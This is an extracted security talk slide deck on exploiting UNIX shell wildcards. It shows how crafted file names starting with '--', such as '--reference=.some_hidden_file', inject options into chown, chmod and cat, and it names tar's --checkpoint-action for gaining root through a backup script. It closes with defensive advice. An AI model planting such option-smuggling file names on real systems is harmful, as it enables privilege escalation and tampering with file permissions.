Date post: | 12-Apr-2017 |
Category: |
Software |
Upload: | unidees-algerie |
View: | 362 times |
Download: | 2 times |
O L D S C H O O L HACKINGExploiting UNIX Wildcards
Emir Fares BELMAHDI
[email protected]@emirfares
www.unidees.dz
FOUR PARTS
About Wildcards Exploiting Wildcards Some useful tricks
Conclusion
ABOUT WILDCARDS
• A character used to substitute for any other character or characters
• Used in regular expressions
• Commonly used in shell commands in Linux and other Unix-like operatingsystems
• In this case wildcards are interpreted by shell before any action
* matches any number of characters in a
filename, including none
? matches any single character.
[ ] Brackets enclose a set of characters,
any one of which may match a single
character
- A hyphen used within [ ] denotes a
range of characters.
~ A tilde at the beginning of a word
expands to the name of your home
directory. If you append another user's
login name to the character, it refers to
that user's home directory.
cat e*
cat te?t.php
cat file[123456789].txt
cat file[1-9].txt
ls ~
ls ~blackfox
EXPLOITING WILDCARDS
Files beginning with (-) character are interpreted as command linearguements
Folder containing some files
File1File2
--help
cat * User executs command
File1File2
--help
cat *
File1File2
--help
cat File1.txt
File content
OK !
cat *
File1File2
--help
cat File2.php
File content
OK !
cat *
File1File2
--help
cat --help
“cat” command help &usage
MAGIC !
USING STRACE
blackfox@dojo:~/wildcards$ strace cat *
blackfox@dojo:~/wildcards$ strace cat *
execve("/bin/cat", ["cat", "File1.txt", "File2.txt", "--help"],[/* 69 vars */]) = 0
blackfox@dojo:~/wildcards$ strace cat *
execve("/bin/cat", ["cat", "File1.txt", "File2.txt", "--help"],[/* 69 vars */]) = 0
1st file 2nd file 3rd file
blackfox@dojo:~/wildcards$ strace cat *
execve("/bin/cat", ["cat", "File1.txt", "File2.txt", "--help"],[/* 69 vars */]) = 0
/bin/cat File1.txt File2.txt --help
1st file 2nd file 3rd file
DEMO
USEFUL TRICKS
CHOWN
blackfox@dojo:~/wildcards$ echo > ''.some_hidden_file''
blackfox@dojo:~/wildcards$ chown user:user .some_hidden_file
blackfox@dojo:~/wildcards$ echo > ''--reference=.some_hidden_file''
CHMOD
blackfox@dojo:~/wildcards$ echo > ''.some_hidden_file''
blackfox@dojo:~/wildcards$ chmod 777 .some_hidden_file
blackfox@dojo:~/wildcards$ echo > ''--reference=.some_hidden_file''
REAL LIFE SCENARIOGETTING ROOT ACCESS
From tar help manual (see: tar --help)
--checkpoint[=NUMBER] : display progress messages every NUMBERth record (default 10)
--checkpoint-action=ACTION : execute ACTION on each checkpoint
executing arbitrary commands with privileges of the user thatruns “tar”
Let's imagine a backup script
DEMO
CONCLUSION
NEVER TRUST INPUTS
Filter file names
AVOID USING WILDCARDS AS A PRIVILEGED USER
(ROOT)
Create a simple user instead
OR
DON'T USE WILDCARDSAT ALL!
Create your own scripts with samefeatures
ALWAYS TEST YOUR SECURITY
Pentesting is important to detect vulnerabilities or misconfigurations